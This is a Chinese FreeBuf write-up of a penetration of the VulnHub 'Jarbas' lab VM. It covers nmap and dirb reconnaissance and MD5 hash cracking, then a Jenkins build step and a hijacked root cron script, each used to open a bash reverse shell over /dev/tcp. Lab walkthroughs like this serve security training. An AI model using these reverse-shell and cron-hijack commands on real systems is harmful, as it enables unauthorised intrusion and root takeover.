官方公众号企业安全新浪微博
FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。
FreeBuf+小程序
jarbas靶场渗透笔记
woodpecker- 关注
jarbas靶场渗透笔记
本文由
woodpecker 创作,已纳入「FreeBuf原创奖励计划」,未授权禁止转载
靶场地址:https://www.vulnhub.com/entry/jarbas-1,232/
信息收集
- 主机发现
nmap -sn 192.168.18.142/24 Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-15 13:32 CST Nmap scan report for 192.168.18.1 Host is up (0.026s latency). MAC Address: 30:AE:7B:E3:91:3F (Deqing Dusun Electron) Nmap scan report for 192.168.18.123 Host is up (0.0020s latency). MAC Address: 8C:AB:8E:7D:2C:F3 (Shanghai Feixun Communication) Nmap scan report for LAPTOP-1DVA2N7.lan (192.168.18.197) Host is up (0.00011s latency). MAC Address: 40:74:E0:20:72:D1 (Intel Corporate) Nmap scan report for jarbas.lan (192.168.18.218) Host is up (0.00034s latency). MAC Address: 00:0C:29:1F:20:4E (VMware) Nmap scan report for kali.lan (192.168.18.142) Host is up. Nmap done: 256 IP addresses (5 hosts up) scanned in 2.28 seconds
- 端口扫描
┌──(root㉿kali)-[~] │
└─# nmap --min-rate 10000 192.168.18.218 │
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-15 13:37 CST │
Nmap scan report for jarbas.lan (192.168.18.218) │
Host is up (0.000074s latency). │
Not shown: 996 closed tcp ports (reset) │
PORT STATE SERVICE │
22/tcp open ssh │
80/tcp open http │
3306/tcp open mysql │
8080/tcp open http-proxy │
MAC Address: 00:0C:29:1F:20:4E (VMware) │
│
Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds - 端口详细信息、操作系统
========TCP └─# nmap -sT -sV -O -p22,80,3306,8080 192.168.18.218 Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-15 13:38 CST Nmap scan report for jarbas.lan (192.168.18.218) Host is up (0.00040s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4 (protocol 2.0) 80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16) 3306/tcp open mysql MariaDB (unauthorized) 8080/tcp open http Jetty 9.4.z-SNAPSHOT MAC Address: 00:0C:29:1F:20:4E (VMware) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.18 seconds =======UDP └─# nmap -sU -p22,80,3306,8080 192.168.18.218 Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-15 13:43 CST Nmap scan report for jarbas.lan (192.168.18.218) Host is up (0.00018s latency). PORT STATE SERVICE 22/udp closed ssh 80/udp closed http 3306/udp closed mysql 8080/udp closed http-alt MAC Address: 00:0C:29:1F:20:4E (VMware) Nmap done: 1 IP address (1 host up) scanned in 0.26 seconds
- 脚本扫描
└─# nmap --script=vuln -p22,80,3306,8080 192.168.18.218 Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-15 13:40 CST Nmap scan report for jarbas.lan (192.168.18.218) Host is up (0.00025s latency). PORT STATE SERVICE 22/tcp open ssh 80/tcp open http |_http-trace: TRACE is enabled | http-enum: |_ /icons/: Potentially interesting folder w/ directory listing |_http-csrf: Couldn't find any CSRF vulnerabilities. |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. |_http-dombased-xss: Couldn't find any DOM based XSS. 3306/tcp open mysql |_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug) 8080/tcp open http-proxy | http-enum: |_ /robots.txt: Robots file MAC Address: 00:0C:29:1F:20:4E (VMware) Nmap done: 1 IP address (1 host up) scanned in 31.81 seconds
80端口8080端口漏洞测试
- 访问80、8080端口浏览一下
- 进行目录扫描
dirb扫描
└─# dirb http://192.168.18.218
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Feb 15 13:50:33 2023
URL_BASE: http://192.168.18.218/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.18.218/ ----
+ http://192.168.18.218/cgi-bin/ (CODE:403|SIZE:210)
+ http://192.168.18.218/index.html (CODE:200|SIZE:32808)
-----------------
END_TIME: Wed Feb 15 13:50:39 2023
DOWNLOADED: 4612 - FOUND: 2御剑扫
"1","http://192.168.18.218/index.html","200" "2","http://192.168.18.218/access.html","200" "3","http://192.168.18.218/\.html","403"
- 浏览扫描页面,发现有用页面http://192.168.18.218/access.html
记录了类似账号密码的页面
tiago:5978a63b4654c73c60fa24f836386d87 trindade:f463f63616cb3f1e81ce46b39f882fd5 eder:9b38e2b1e8b12f426b0d208a7ab6cb98
- 进行密码识别
hash-identifier 5978a63b4654c73c60fa24f836386d87
#########################################################################
# __ __ __ ______ _____ #
# /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
# \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
# \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
# \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
# \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
# \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
# By Zion3R #
# www.Blackploit.com #
# Root@Blackploit.com #
#########################################################################
--------------------------------------------------
Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))为MD5
- 进行密码破解
5978a63b4654c73c60fa24f836386d87:italia99 9b38e2b1e8b12f426b0d208a7ab6cb98:vipsu f463f63616cb3f1e81ce46b39f882fd5:marianna tiago:italia99 trindade:vipsu eder:marianna
- 进行8080端口登录尝试
这里要进行账号和密码的一个碰撞,尝试发现下面一个账号能成功
eder:vipsu
- 在构建项目的时候插入反弹shell
- 新建任务
- 新建任务,点击确定
- 在构建后操作,写上shell反弹命令
- 写上反弹shell点击保存
bash -i >& /dev/tcp/ip/port 0>&1
- 在攻击机上面保持nc监听后点击构建
nc -lvvp 4444 listening on [any] 4444 ...
- 查看有用信息
bash-4.2$ uname -a │2: eth0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc fq_codel state DOWN group default qlen
uname -a │1000
Linux jarbas 3.10.0-693.21.1.el7.x86_64 #1 SMP Wed Mar 7 19:03:37 UTC 2018 x86_64 x86_64 x│ link/ether 00:0c:29:3e:ec:e7 brd ff:ff:ff:ff:ff:ff
86_64 GNU/Linux │3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
bash-4.2$ sudo -l │ link/ether 00:0c:29:3e:ec:fb brd ff:ff:ff:ff:ff:ff
sudo -l │ inet 192.168.18.142/24 brd 192.168.18.255 scope global dynamic noprefixroute eth1
│ valid_lft 37169sec preferred_lft 37169sec
We trust you have received the usual lecture from the local System │ inet6 fe80::20c:29ff:fe3e:ecfb/64 scope link noprefixroute
Administrator. It usually boils down to these three things: │ valid_lft forever preferred_lft forever
│4: br-df3300895475: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group def
#1) Respect the privacy of others. │ault
#2) Think before you type. │ link/ether 02:42:e8:f1:6e:2e brd ff:ff:ff:ff:ff:ff
#3) With great power comes great responsibility. │ inet 172.18.0.1/16 brd 172.18.255.255 scope global br-df3300895475
│ valid_lft forever preferred_lft forever
sudo: no tty present and no askpass program specified 发现权限很低,进行提权
提权
- 查看账号
bash-4.2$ cat /etc/passwd cat /etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin polkitd:x:999:997:User for polkitd:/:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin chrony:x:998:996::/var/lib/chrony:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin eder:x:1000:1000:Eder Luiz:/home/eder:/bin/bash apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin jenkins:x:997:995:Jenkins Automation Server:/var/lib/jenkins:/bin/false bash-4.2$
发现eder账号,尝试ssh复用
┌──(root㉿kali)-[~] └─# ssh eder@219.168.18.218 ssh: connect to host 219.168.18.218 port 22: Connection timed out
- 尝试使用定时任务提权
发现是有定时任务的
bash-4.2$ cat /etc/crontab cat /etc/crontab SHELL=/bin/bash PATH=/sbin:/bin:/usr/sbin:/usr/bin MAILTO=root # For details see man 4 crontabs # Example of job definition: # .---------------- minute (0 - 59) # | .------------- hour (0 - 23) # | | .---------- day of month (1 - 31) # | | | .------- month (1 - 12) OR jan,feb,mar,apr ... # | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat # | | | | | # * * * * * user-name command to be executed */5 * * * * root /etc/script/CleaningScript.sh >/dev/null 2>&1 bash-4.2$ cat /etc/script/CleaningScript.sh cat /etc/script/CleaningScript.sh #!/bin/bash rm -rf /var/log/httpd/access_log.txt
- 在定时任务中追加反弹shell
在运行之前,先进行监听
└─# nc -lvvp 4442 listening on [any] 4442 ...
echo '/bin/bash -i >& /dev/tcp/192.168.18.142/4442 0>&1' >> /etc/script/CleaningScript.sh
等待五分钟左右即可
┌──(root㉿kali)-[~/Desktop/vulhub]
└─# nc -lvp 4442
listening on [any] 4442 ...
connect to [192.168.18.142] from jarbas.lan [192.168.18.218] 42608
bash: no job control in this shell
[root@jarbas ~]# sudo -l
sudo -l
Matching Defaults entries for root on jarbas:
!visiblepw, always_set_home, match_group_by_gid, env_reset,
env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User root may run the following commands on jarbas:
(ALL) ALL
[root@jarbas ~]# 至此渗透结束
总结
- 对crontab总结
- 一般低权限账号是没有定时任务写的权限的,但是可以根据已写的高权限文件添加反弹shell
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
woodpecker
这家伙太懒了,还未填写个人描述!
已在FreeBuf发表 2 篇文章
本文为 woodpecker 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
woodpecker LV.2
这家伙太懒了,还未填写个人描述!
- 2 文章数
- 0 关注者
w1res靶场渗透笔记
2023-02-15
文章目录